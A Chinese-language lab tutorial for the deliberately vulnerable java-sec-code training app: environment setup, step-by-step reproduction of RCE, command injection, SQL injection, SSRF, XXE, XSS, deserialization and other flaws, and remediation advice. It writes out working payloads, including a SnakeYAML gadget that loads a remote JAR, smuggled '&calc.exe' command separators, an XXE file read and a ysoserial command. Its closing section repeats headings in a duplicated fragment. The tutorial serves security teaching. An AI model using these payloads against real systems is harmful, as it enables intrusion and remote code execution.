Java-sec-code-master 靶场实战教学文档<\/h2>

一、靶场环境搭建<\/h3>

1.1 环境要求<\/h4>

IDE<\/strong>: IntelliJ IDEA<\/li>
构建工具<\/strong>: Apache Maven 3.9.1+<\/li>
Web服务器<\/strong>: Apache Tomcat 9.0.x<\/li>
Java环境<\/strong>: JDK 1.8<\/li>

数据库<\/strong>: MySQL 5.7.26+<\/li> <\/ul>
1.2 部署步骤<\/h4>

获取源码<\/strong>：<\/p>
git clone https:\/\/github.com\/JoyChou93\/java-sec-code.git <\/span><\/span><\/code><\/pre><\/li> 数据库配置<\/strong>：<\/p> 启动MySQL数据库（例如使用phpStudy、XAMPP等集成环境中的MySQL）。<\/li> 创建数据库，并导入项目中的SQL文件（通常为 sql\/<\/code> 目录下的 .sql<\/code> 文件）。<\/li> 修改项目配置文件 src\/main\/resources\/application.properties<\/code>，更新数据库连接信息（URL、用户名、密码）。<\/li> <\/ul> <\/li> 项目配置与启动<\/strong>：<\/p> 使用IDEA打开项目。<\/li> 在 application.properties<\/code> 中可修改服务器端口（默认8080，若冲突可改为8081）：server.port=8081<\/code>。<\/li> 执行Maven命令 mvn clean install<\/code> 下载依赖并编译项目。<\/li> 运行主类 Application.java<\/code>。<\/li> 访问 http:\/\/127.0.0.1:8081<\/code>，出现界面即表示搭建成功。<\/li> <\/ul> <\/li> Windows环境特殊调整<\/strong>：由于原作者环境为Linux，部分命令执行漏洞需调整以适应Windows。<\/p> 修改 CommandInject.java<\/code><\/strong>: \/\/ 将Linux命令 <\/span><\/span><\/span><\/span>String[]<\/span> cmdList =<\/span> new<\/span> String[]{<\/span>"sh"<\/span>,<\/span> "-c"<\/span>,<\/span> "ls -la "<\/span> +<\/span> filepath};<\/span> <\/span><\/span>\/\/ 改为Windows命令 <\/span><\/span><\/span><\/span>String[]<\/span> cmdList =<\/span> new<\/span> String[]{<\/span>"cmd.exe"<\/span>,<\/span> "\/c"<\/span>,<\/span> "dir "<\/span> +<\/span> filepath};<\/span> <\/span><\/span><\/code><\/pre><\/li> 修改前端页面 index.html<\/code><\/strong>，将示例POC路径从Linux格式（\/etc\/passwd<\/code>）改为Windows格式（如 D:\/test.txt<\/code>）。<\/li> <\/ul> <\/li> <\/ol> 二、漏洞复现详解<\/h3> 本部分将按漏洞类型逐一讲解。<\/p> 2.1 远程代码执行（RCE）<\/h4> 漏洞点1：Rce.java - \/runtime\/exec<\/code><\/h5> 原理<\/strong>：直接使用 Runtime.getRuntime().exec(cmd)<\/code> 执行用户传入的参数，未做任何过滤。<\/li> 漏洞代码<\/strong>： @GetMapping<\/span>(<\/span>"\/runtime\/exec"<\/span>)<\/span> <\/span><\/span>public<\/span> String CommandExec<\/span>(<\/span>String cmd)<\/span> {<\/span> <\/span><\/span> Runtime run =<\/span> Runtime.<\/span>getRuntime<\/span>();<\/span> <\/span><\/span> Process p =<\/span> run.<\/span>exec<\/span>(<\/span>cmd);<\/span> \/\/ 危险！直接执行用户输入 <\/span><\/span><\/span><\/span> \/\/ ... 读取命令输出 <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> 复现<\/strong>：访问 http:\/\/127.0.0.1:8081\/rce\/runtime\/exec?cmd=calc.exe<\/code>（Windows计算器）或 cmd=whoami<\/code>。<\/li> <\/ul> 漏洞点2：Rce.java - \/jscmd<\/code><\/h5> 原理<\/strong>：使用Nashorn JavaScript引擎，通过 load()<\/code> 函数加载并执行远程JS脚本。<\/li> 漏洞代码<\/strong>： @GetMapping<\/span>(<\/span>"\/jscmd"<\/span>)<\/span> <\/span><\/span>public<\/span> void<\/span> jsEngine<\/span>(<\/span>String jsurl)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> ScriptEngine engine =<\/span> new<\/span> ScriptEngineManager().<\/span>getEngineByName<\/span>(<\/span>"js"<\/span>);<\/span> <\/span><\/span> String cmd =<\/span> String.<\/span>format<\/span>(<\/span>"load(\"%s\")"<\/span>,<\/span> jsurl);<\/span> <\/span><\/span> engine.<\/span>eval<\/span>(<\/span>cmd,<\/span> bindings);<\/span> \/\/ 加载并执行远程JS <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> 复现<\/strong>：编写恶意JS文件 zz.js<\/code>： var<\/span> Runtime<\/span> =<\/span> Java<\/span>.type<\/span>("java.lang.Runtime"<\/span>); <\/span><\/span>Runtime<\/span>.getRuntime<\/span>().exec<\/span>("calc.exe"<\/span>); <\/span><\/span><\/code><\/pre><\/li> 在JS文件所在目录启动HTTP服务：python -m http.server 8000<\/code>。<\/li> 访问 http:\/\/127.0.0.1:8081\/rce\/jscmd?jsurl=http:\/\/localhost:8000\/zz.js<\/code>。<\/li> <\/ol> <\/li> <\/ul> 漏洞点3：Rce.java - \/vuln\/yarm<\/code> (SnakeYAML反序列化)<\/h5> 原理<\/strong>：使用SnakeYAML的 new Yaml()<\/code> 默认构造器解析YAML内容，该构造器允许实例化任意Java类，导致反序列化RCE。<\/li> 漏洞代码<\/strong>： @GetMapping<\/span>(<\/span>"\/vuln\/yarm"<\/span>)<\/span> <\/span><\/span>public<\/span> void<\/span> yarm<\/span>(<\/span>String content)<\/span> {<\/span> <\/span><\/span> Yaml y =<\/span> new<\/span> Yaml();<\/span> \/\/ 默认不安全 <\/span><\/span><\/span><\/span> y.<\/span>load<\/span>(<\/span>content);<\/span> \/\/ 触发反序列化 <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> 复现<\/strong>：准备恶意JAR：使用 yaml-payload<\/code><\/a> 项目，编译生成包含恶意构造器的JAR包。<\/li> 启动HTTP服务托管该JAR。<\/li> 使用YSOSERIAL或构造特定YAML Payload（利用 ScriptEngineManager<\/code> 和 URLClassLoader<\/code>）： http:\/\/127.0.0.1:8081\/rce\/vuln\/yarm?content=!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http:\/\/your-ip:8000\/yaml-payload.jar"]]]] <\/code><\/pre> （注意URL编码）<\/li> <\/ol> <\/li> <\/ul> 漏洞点4：Rce.java - \/groovy<\/code><\/h5> 原理<\/strong>：使用 GroovyShell.evaluate(content)<\/code> 直接执行用户输入的Groovy代码。<\/li> 复现<\/strong>：访问 http:\/\/127.0.0.1:8081\/rce\/groovy?content="calc".execute()<\/code>。<\/li> <\/ul> 2.2 命令注入（Command Injection）<\/h4> 漏洞点：CommandInject.java - \/codeinject<\/code><\/h5> 原理<\/strong>：将用户输入的 filepath<\/code> 直接拼接到 dir<\/code> 命令中，未过滤命令分隔符。<\/li> 漏洞代码<\/strong>： @GetMapping<\/span>(<\/span>"\/codeinject"<\/span>)<\/span> <\/span><\/span>public<\/span> String codeInject<\/span>(<\/span>String filepath)<\/span> throws<\/span> IOException {<\/span> <\/span><\/span> String[]<\/span> cmdList =<\/span> new<\/span> String[]{<\/span>"cmd.exe"<\/span>,<\/span> "\/c"<\/span>,<\/span> "dir "<\/span> +<\/span> filepath};<\/span> \/\/ 拼接漏洞 <\/span><\/span><\/span><\/span> ProcessBuilder builder =<\/span> new<\/span> ProcessBuilder(<\/span>cmdList);<\/span> <\/span><\/span> \/\/ ... 执行命令 <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> 复现<\/strong>：利用 &<\/code>、|<\/code> 等符号拼接新命令，需要URL编码。 http:\/\/127.0.0.1:8081\/codeinject?filepath=.%26calc.exe<\/code> (URL编码后 &<\/code> 为 %26<\/code>)<\/li> http:\/\/127.0.0.1:8081\/codeinject?filepath=.%26ipconfig<\/code><\/li> <\/ul> <\/li> <\/ul> 2.3 SQL注入（SQL Injection）<\/h4> 漏洞点1：Sqli.java - \/jdbc\/vuln<\/code><\/h5> 原理<\/strong>：直接拼接用户输入 username<\/code> 到SQL语句中。<\/li> 漏洞代码<\/strong>： String sql =<\/span> "select * from users where username = '"<\/span> +<\/span> username +<\/span> "'"<\/span>;<\/span> <\/span><\/span><\/code><\/pre><\/li> 复现<\/strong>： http:\/\/127.0.0.1:8081\/sqli\/jdbc\/vuln?username=joychou' OR '1'='1<\/code><\/li> <\/ul> 漏洞点2：Sqli.java - \/mybatis\/vuln01<\/code> (MyBatis)<\/h5> 原理<\/strong>：在MyBatis的 @Select<\/code> 注解中使用 ${username}<\/code> 进行拼接（而非安全的 #{}<\/code>）。<\/li> 漏洞代码<\/strong>： @Select<\/span>(<\/span>"select * from users where username = '${username}'"<\/span>)<\/span> <\/span><\/span>List<<\/span>User><\/span> findByUserNameVuln01<\/span>(<\/span>@Param<\/span>(<\/span>"username"<\/span>)<\/span> String username);<\/span> <\/span><\/span><\/code><\/pre><\/li> 复现<\/strong>： http:\/\/127.0.0.1:8081\/sqli\/mybatis\/vuln01?username=admin' OR '1'='1<\/code><\/li> <\/ul> 漏洞点3：Sqli.java - \/mybatis\/orderby\/vuln03<\/code> (MyBatis Order By注入)<\/h5> 原理<\/strong>：ORDER BY<\/code> 后不能使用预编译占位符 #{}<\/code>，只能使用 ${}<\/code> 拼接，导致注入。<\/li> 漏洞代码<\/strong> (XML配置)： <select<\/span> id=<\/span>"findByUserNameVuln03"<\/span> parameterType=<\/span>"String"<\/span> resultMap=<\/span>"User"<\/span>><\/span> <\/span><\/span> select * from users <\/span><\/span> <if<\/span> test=<\/span>"order != null"<\/span>><\/span> <\/span><\/span> order by ${order} asc <\/span> <\/span><\/span> <\/if><\/span> <\/span><\/span><\/select><\/span> <\/span><\/span><\/code><\/pre><\/li> 复现<\/strong>： http:\/\/127.0.0.1:8081\/sqli\/mybatis\/orderby\/vuln03?sort=id desc--+<\/code><\/li> <\/ul> 2.4 服务器端请求伪造（SSRF）<\/h4> 漏洞点：SSRF.java - \/urlConnection\/vuln<\/code><\/h5> 原理<\/strong>：使用 URLConnection<\/code> 请求用户传入的 url<\/code>，未对协议和目标地址进行白名单校验。<\/li> 漏洞代码<\/strong>： @GetMapping<\/span>(<\/span>value =<\/span> "\/urlConnection\/vuln"<\/span>)<\/span> <\/span><\/span>public<\/span> String URLConnectionVuln<\/span>(<\/span>String url)<\/span> {<\/span> <\/span><\/span> return<\/span> HttpUtils.<\/span>URLConnection<\/span>(<\/span>url);<\/span> \/\/ 内部直接 new URL(url).openConnection() <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> 复现<\/strong>：读取本地文件：http:\/\/127.0.0.1:8081\/ssrf\/urlConnection\/vuln?url=file:\/\/\/D:\/test.txt<\/code><\/li> 探测内网服务：http:\/\/127.0.0.1:8081\/ssrf\/urlConnection\/vuln?url=http:\/\/192.168.1.1:8080<\/code><\/li> <\/ul> <\/li> <\/ul> 2.5 XML外部实体注入（XXE）<\/h4> 漏洞点1：XXE.java - \/xmlReader\/vuln<\/code><\/h5> 原理<\/strong>：使用SAX解析器 XMLReader<\/code> 解析XML时，未禁用外部实体。<\/li> 漏洞代码<\/strong>： XMLReader xmlReader =<\/span> XMLReaderFactory.<\/span>createXMLReader<\/span>();<\/span> <\/span><\/span>xmlReader.<\/span>parse<\/span>(<\/span>new<\/span> InputSource(<\/span>new<\/span> StringReader(<\/span>body)));<\/span> \/\/ 未配置安全特性 <\/span><\/span><\/span><\/code><\/pre><\/li> 复现<\/strong>：发送POST请求至 \/xxe\/xmlReader\/vuln<\/code>，Body为恶意XML： <?xml version="1.0" encoding="UTF-8"?><\/span> <\/span><\/span><!DOCTYPE foo [ <\/span><\/span><\/span> <!ENTITY xxe SYSTEM "file:\/\/\/C:\/Windows\/win.ini"><\/span> <\/span><\/span>]> <\/span><\/span><root><\/span> <\/span><\/span> <name><\/span>&xxe;<\/name><\/span> <\/span><\/span><\/root><\/span> <\/span><\/span><\/code><\/pre>（使用Burp Suite或Postman等工具发送）<\/li> <\/ul> 漏洞点2：XXE.java - \/SAXBuilder\/vuln<\/code> (JDOM)<\/h5> 原理<\/strong>：JDOM的 SAXBuilder<\/code> 默认也未禁用外部实体。<\/li> 复现<\/strong>：方式同上。<\/li> <\/ul> 2.6 跨站脚本（XSS）<\/h4> 漏洞点1：XSS.java - \/reflect<\/code><\/h5> 原理<\/strong>：将用户输入直接返回给浏览器，未做转义。<\/li> 复现<\/strong>： http:\/\/127.0.0.1:8081\/xss\/reflect?xss=<script>alert(1)<\/script><\/code><\/li> <\/ul> 漏洞点2：XSS.java - \/stored\/store<\/code> & \/stored\/show<\/code> (存储型XSS)<\/h5> 原理<\/strong>：将用户输入存入Cookie，再从Cookie中读出并返回。<\/li> 复现<\/strong>：访问 http:\/\/127.0.0.1:8081\/xss\/stored\/store?xss=<script>alert(1)<\/script><\/code> 将Payload存入Cookie。<\/li> 访问 http:\/\/127.0.0.1:8081\/xss\/stored\/show<\/code> 触发XSS。<\/li> <\/ol> <\/li> <\/ul> 2.7 反序列化漏洞<\/h4> 漏洞点1：Deserialize.java - \/rememberMe\/vuln<\/code><\/h5> 原理<\/strong>：对Base64解码后的Cookie值直接进行Java原生反序列化。<\/li> 漏洞代码<\/strong>： String rememberMe =<\/span> cookie.<\/span>getValue<\/span>();<\/span> <\/span><\/span>byte<\/span>[]<\/span> decoded =<\/span> Base64.<\/span>getDecoder<\/span>().<\/span>decode<\/span>(<\/span>rememberMe);<\/span> <\/span><\/span>ObjectInputStream in =<\/span> new<\/span> ObjectInputStream(<\/span>new<\/span> ByteArrayInputStream(<\/span>decoded));<\/span> <\/span><\/span>in.<\/span>readObject<\/span>();<\/span> \/\/ 触发反序列化 <\/span><\/span><\/span><\/code><\/pre><\/li> 复现<\/strong>：使用YSOSERIAL生成恶意序列化数据（如CommonsCollections5 gadget）： java -jar ysoserial.jar CommonsCollections5 "calc.exe" > payload.bin<\/code><\/li> 将 payload.bin<\/code> 内容进行Base64编码。<\/li> 将编码后的字符串作为 rememberMe<\/code> Cookie的值，发送请求至 \/deserialize\/rememberMe\/vuln<\/code>。<\/li> <\/ol> <\/li> <\/ul> 漏洞点2：Shiro.java - \/shiro\/deserialize<\/code> (Apache Shiro)<\/h5> 原理<\/strong>：Shiro的RememberMe功能使用AES加密后的序列化数据。如果使用默认密钥且版本存在漏洞，攻击者可伪造Cookie触发反序列化。<\/li> 复现<\/strong>：利用Shiro-550\/721等公开漏洞利用工具或脚本。<\/li> <\/ul> 2.8 其他重要漏洞<\/h4> 路径遍历（Path Traversal）<\/strong>: PathTraversal.java<\/code>，通过 ..\/<\/code> 等序列读取系统任意文件。<\/li> 日志注入（Log4j）<\/strong>: Log4j.java<\/code>，在受影响版本中，用户输入 token<\/code> 中的 ${jndi:ldap:\/\/...}<\/code> 会被解析执行。<\/li> 服务器端模板注入（SSTI）<\/strong>: SSTI.java<\/code>，Velocity引擎中直接执行用户输入的模板内容。<\/li> 跨域资源共享（CORS）配置不当<\/strong>: Cors.java<\/code>，将请求头 Origin<\/code> 直接反射到 Access-Control-Allow-Origin<\/code>，导致任意源可跨域访问。<\/li> HTTP响应头截断（CRLF）<\/strong>: CRLFInjection.java<\/code>，用户输入未过滤 \r\n<\/code>，可注入任意HTTP响应头。<\/li> <\/ul> 三、漏洞修复方案总结<\/h3> RCE\/命令注入<\/strong>：<\/p> 避免直接执行用户输入。如需执行命令，应使用白名单严格控制参数。<\/li> 对用户输入进行严格过滤（如正则表达式 ^[a-zA-Z0-9_\/\.-]+$<\/code>）。<\/li> <\/ul> <\/li> SQL注入<\/strong>：<\/p> 永远不要使用字符串拼接<\/strong>。<\/li> 使用预编译语句（PreparedStatement）<\/strong> 和参数化查询（?<\/code> 占位符）。<\/li> 在MyBatis中，优先使用 #{}<\/code>，避免使用 ${}<\/code>。如必须使用 ${}<\/code>（如Order By），需自行实现过滤或白名单。<\/li> <\/ul> <\/li> SSRF<\/strong>：<\/p> 建立URL白名单<\/strong>或黑名单<\/strong>。<\/li> 校验协议（只允许HTTP\/HTTPS）、目标IP（禁止内网地址）。<\/li> <\/ul> <\/li> XXE<\/strong>：<\/p> 在所有XML解析器中，显式禁用DTD和外部实体。<\/li> <\/ul> \/\/ 以SAXParser为例 <\/span><\/span><\/span><\/span>SAXParserFactory spf =<\/span> SAXParserFactory.<\/span>newInstance<\/span>();<\/span> <\/span><\/span>spf.<\/span>setFeature<\/span>(<\/span>"http:\/\/apache.org\/xml\/features\/disallow-doctype-decl"<\/span>,<\/span> true<\/span>);<\/span> <\/span><\/span>spf.<\/span>setFeature<\/span>(<\/span>"http:\/\/xml.org\/sax\/features\/external-general-entities"<\/span>,<\/span> false<\/span>);<\/span> <\/span><\/span>spf.<\/span>setFeature<\/span>(<\/span>"http:\/\/xml.org\/sax\/features\/external-parameter-entities"<\/span>,<\/span> false<\/span>);<\/span> <\/span><\/span><\/code><\/pre><\/li> XSS<\/strong>：<\/p> 对输出到HTML页面的数据进行HTML转义<\/strong>（如转义 <<\/code>, ><\/code>, &<\/code>, "<\/code>, '<\/code>）。<\/li> <\/ul> <\/li> 反序列化<\/strong>：<\/p> 避免反序列化不可信数据。<\/li> 使用安全的反序列化库或方法，如使用 ObjectInputStream<\/code> 时重写 ObjectInputStream.resolveClass()<\/code> 方法进行白名单校验。<\/li> 升级存在漏洞的第三方库（如Commons-Collections, SnakeYAML, XStream, Shiro）。<\/li> <\/ul> <\/li> 配置安全<\/strong>：<\/p> 确保框架、中间件（如Logback, Jolokia）的安全配置，避免不必要的接口暴露。<\/li> 使用强密钥，避免使用默认密钥。<\/li> <\/ul> <\/li> <\/ol> 四、工具使用<\/h3> YSOSERIAL<\/strong>：生成Java反序列化利用Payload的工具。<\/li> Burp Suite<\/strong>：用于拦截、重放、修改HTTP请求，是复现Web漏洞的必备工具。<\/li> DNSLog平台<\/strong>：用于检测无回显的漏洞（如XXE、SSRF、Log4j），接收DNS查询记录。<\/li> <\/ul> 通过本教学文档的系统性学习和实践，您将能够深入理解Java Web应用中常见的安全漏洞成因、利用手法及有效的防御措施，显著提升代码安全审计和漏洞挖掘能力。<\/p>

Java-sec-code-master 靶场实战教学文档<\/h2>

一、 靶场环境搭建<\/h3>

二、 漏洞复现详解<\/h3> 本部分将按漏洞类型逐一讲解。<\/p>

2.1 远程代码执行（RCE）<\/h4>

2.2 命令注入（Command Injection）<\/h4>

2.3 SQL注入（SQL Injection）<\/h4>

2.4 服务器端请求伪造（SSRF）<\/h4>

2.5 XML外部实体注入（XXE）<\/h4>

2.6 跨站脚本（XSS）<\/h4>

2.7 反序列化漏洞<\/h4>

一、靶场环境搭建<\/h3>

二、漏洞复现详解<\/h3>
本部分将按漏洞类型逐一讲解。<\/p>